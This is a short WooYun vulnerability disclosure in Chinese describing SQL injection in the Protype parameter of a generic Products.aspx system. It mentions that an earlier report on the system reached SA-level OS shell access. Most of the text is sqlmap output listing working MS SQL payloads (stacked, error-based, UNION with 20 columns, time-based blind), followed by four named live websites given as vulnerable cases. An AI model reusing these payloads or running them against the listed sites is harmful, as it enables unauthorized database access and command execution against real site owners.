WooYun.org

前人发过一个注入点（参数id=）
WooYun: 某通用型系统SQL注射#2(SA权限)
全是sa 可执行os-shell 系统命令
Products.aspx?Protype=
Protype 单引号报错
Place: GET
Parameter: Protype
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: Protype='; IF(8472=8472) SELECT 8472 ELSE DROP FUNCTION bOGr--
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Protype=' AND 6927=CONVERT(INT,(CHAR(58) CHAR(107) CHAR(105) CHAR(9
7) CHAR(58) (SELECT (CASE WHEN (6927=6927) THEN CHAR(49) ELSE CHAR(48) END)) CHA
R(58) CHAR(97) CHAR(104) CHAR(108) CHAR(58))) AND 'vkKJ'='vkKJ
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: Protype=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,CHAR(58) CHAR(107) CHAR(105) CHAR(97) CHAR(58) CHAR(112) CHA
R(65) CHAR(108) CHAR(109) CHAR(113) CHAR(65) CHAR(88) CHAR(87) CHAR(89) CHAR(86)
CHAR(58) CHAR(97) CHAR(104) CHAR(108) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NU
LL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Protype='; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Protype=' WAITFOR DELAY '0:0:5'--
案例1：
http://www.hongshunleather.com/Products.aspx?Protype=

案例2：
http://abeeroo.com/Products.aspx?Protype=

案例3：
http://www.piergitar.com/en/Products.aspx?Protype=%27

案例4：
http://www.xysport.net/Products.aspx?Protype=